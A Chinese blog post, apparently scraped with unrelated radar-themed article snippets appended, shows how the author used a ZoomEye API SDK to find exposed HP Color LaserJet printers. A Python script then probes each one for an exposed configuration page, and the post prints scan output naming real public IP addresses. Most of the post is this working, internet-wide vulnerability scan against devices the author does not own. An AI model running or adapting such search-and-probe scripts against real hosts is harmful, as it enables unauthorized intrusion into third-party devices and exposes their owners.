ZoomEye+Seebug雷达火炮双引擎的威力

ZoomEye想必大家都很熟悉,不熟悉的话。撒旦总是熟悉的。还不熟悉的话,google你总是熟悉的。否则你实在不应该看这篇文章了。233333,开个玩笑。不过话说回来了,我这么一说,你大概是知道ZoomEye是怎么回事的。不知道的话,请百度一下。我等你回来~

说了这么多的废话,今天到底要干啥?下面开始表演。

一次十分机密的任务,然后写了一个ZoomEye api的sdk。恰好又在Seebug写了一个插件。是检测一个IOT设备漏洞的。然后找插件检测站点时候犯难了。死活找不到。

话说你不是说ZoomEye多么的厉害吗?

没错!!!

就是这个。我用自己写的SDK配合开放的api。接着:

#!/usr/bin/env python
# -*-coding:utf-8 -*-

import sys
import requests
import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = ‘your [email protected]‘
password = ‘your zoomeye account password‘

token = test.logIn(username, password)

就这样我已经登录了ZoomEye。什么?你说你不信?

#!/usr/bin/env python
# -*-coding:utf-8 -*-

import sys
import requests
import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = ‘your [email protected]‘
password = ‘your ZoomEye account password‘

token = test.logIn(username, password)

result = test.search(‘web‘,query=‘HP Color LaserJet‘,page=1,facets=‘app,os‘)

print result

 告诉我你看到了什么?

是不是瞬间感觉自己萌萌哒~

接着我这样写了一个脚本。

#!/usr/bin/env python
# -*-coding:utf-8 -*-

import sys
import requests
import zoomeye.zoomeye as zoomeye

test = zoomeye.zoomeye()

username = ‘your [email protected]‘
password = ‘your ZoomEye account password‘

token = test.logIn(username, password)

result = test.search(‘web‘,query=‘HP Color LaserJet‘,page=1,facets=‘app,os‘)

target = []

for i in result:
    for x in i[‘matches‘]:
        print x[‘ip‘]
        target.append(x[‘ip‘][0])

for ip in target:
    try:
        payload = ‘/hp/device/InternalPages/Index?id=ConfigurationPage‘
        url = ‘http://‘ + ip + payload
        res_exp = requests.get(url)
        print ‘[-]checking url %s‘ % url
        if res_exp.status_code == 200 and ‘HomeDeviceName‘ in res_exp.content and ‘HomeDeviceIp‘ in res_exp.content:
            print ‘[+]%s is vul‘ % url
        elif res_exp.status_code != 200:
            print ‘[+]%s is static‘ % url
        else:
            pass

    except Exception, e:
        pass

 然后结果是这样的:

[-]checking url http://192.185.150.112/hp/device/InternalPages/Index?id=ConfigurationPage
[-]checking url http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://140.118.123.43/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://31.160.189.69/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://129.89.57.148/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://170.210.3.40/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://74.208.41.246/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://140.112.57.144/hp/device/InternalPages/Index?id=ConfigurationPage is static
[-]checking url http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage
[+]http://67.63.41.136/hp/device/InternalPages/Index?id=ConfigurationPage is static

  没卵用啊~_~

换一页继续:修改page参数。

因为账户等级的问题。这里是有限制策略的。  当修改为2的时候,结果

{u‘url‘: u‘https://www.zoomeye.org/api/doc#limitations‘, u‘message‘: u‘account was suspend, excceeding the 30% of total (7.5)‘, u‘error‘: u‘suspended‘}

  然后试了试网页版。经过不懈努力。

最终

https://xxxxx/hp/device/InternalPages/Index?id=ConfigurationPage is vul

插件提交在了Seebug。

时间: 2024-08-03 08:34:08

ZoomEye+Seebug雷达火炮双引擎的威力的相关文章

合成孔径雷达(Synthetic Aperture Radar, SAR)

合成孔径雷达(Synthetic Aperture Radar, SAR)是20世纪最先进的科技发明之一.SAR有机载与卫载系统之分,能提供地表地形.乃至行星等远距离目标区高解析度图像.目前无人飞行载具挂载合成孔径雷达在监视和侦察任务需求上持续成长,并可搜集战术和战略情资.具体来说,无人飞行载具合成孔径雷达已经取代了部份的光学与红外线感测器,因为它提供了许多独特的,有价值的功能,例如远距离.全天时与全天候成像.地面移动目标指示与聚焦成像等.无人飞行载具合成孔径雷达系统有低成本.体积小.低风险,并

中国反隐雷达将亮相巴黎航展 可通过广播调频发现F22

中国电子科技集团第十四研究所报道,6月19-25日,法国巴黎国际航空航天展览会将在巴黎东北的布尔歇机场举行.中国电子科技集团作为"世界五百强"首度组团亮相巴黎,中国电科14所将携带十余款军用和民用雷达电子系统装备亮相巴黎.向世界展示中国雷达水平.目前各项参展工作已经准备就绪. 走向世界,打造中国雷达名片 过去数十年间,中国电科14所在满足国内市场需求的同时积极开拓国际市场,已经向20多个国家出售了大量先进雷达系统装备.这些装备在部分国家中经受住了战火的考验和洗礼,获得了国际用户的一致好

ThoughtWorks 2017技术雷达

前言: ThoughtWorks人酷爱技术.我们对技术进行构建.研究. 测试.开源.记述,并始终致力于对其进行改进-以求造福 大众.我们的使命是支持卓越软件并掀起IT革命.我们创建 并分享ThoughtWorks技术雷达就是为了支持这一使命.由 ThoughtWorks中一群资深技术领导组成的ThoughtWorks 技术顾问委员会(TAB)创建了该雷达.他们定期开会讨论 Thoughtworks的全球技术战略以及对行业有重大影响的 技术趋势. 这个雷达以独特的形式记录技术顾问委员会的讨论结果,

python爬虫--自动获取seebug的poc

简单的写了一个爬取www.seebug.org上poc的小玩意儿~ 首先我们进行一定的抓包分析 我们遇到的第一个问题就是seebug需要登录才能进行下载,这个很好处理,只需要抓取返回值200的页面,将我们的headers信息复制下来就行了 (这里我就不放上我的headers信息了,不过headers里需要修改和注意的内容会在下文讲清楚) headers = { 'Host':******, 'Connection':'close', 'Accept':******, 'User-Agent':*

2625 雷达安装

2625 雷达安装 时间限制: 1 s 空间限制: 32000 KB 题目等级 : 黄金 Gold 题目描述 Description 假定海岸线是一条无限延伸的直线,陆地在海岸线的一边,大海在另一侧.海中有许多岛屿,每一个小岛我们可以认为是一个点.现在要在海岸线上安装雷达,雷达的覆盖范围是d,也就是说大海中一个小岛能被安装的雷达覆盖,那么它们之间的距离最大为d. 我们使用平面直角坐标系,定义海岸线是x轴,大海在x轴上方,陆地在下方.给你海中每一个岛屿的坐标位置(x,y)和要安装的雷达所覆盖的范围

一些雷达信号处理的好书

入门: <雷达原理> <雷达系统> <雷达系统分析与设计(MATLAB版)> 进阶:        <雷达信号处理和数据处理技术>(吴顺君)        <现代雷达系统分析与设计>(陈伯孝)        <数字阵列雷达和软件化雷达>

依赖注入的威力,.NET Core的魅力:解决MVC视图中的中文被html编码的问题

有园友在博问中提了这样一个问题 —— .NET Core 中文等非英文文字html编码输出问题,到我们的 ASP.NET Core 项目中一看,也是同样的问题. 比如下面的Razor视图代码: @{ ViewBag.Title = "代码改变世界"; } <title>@ViewBag.Title</title> 输出的html代码变成了: <title>代码改变世界</title> 上面的 @ViewBag.Title 实际上等同于下面

贪心 Radar Installation (求最少探测雷达)

Description Assume the coasting is an infinite straight line. Land is in one side of coasting, sea in the other. Each small island is a point locating in the sea side. And any radar installation, locating on the coasting, can only cover d distance, s

Sentinel-1雷达数据可以免费下载

The Sentinel-1 Scientific Data Hub(https://scihub.esa.int )网站提供免费下载 Sentinel-1雷达数据Level-0 和 Level-1级别存档数据.可以下载产品接受模式包括: Strip Map (SM) Interferometric Wide Swath (IW) Extra Wide Swath (EW) 提供下载的数据是从10月3号接收的存档数据. 第一步:注册 进入https://scihub.esa.int. 单击图标,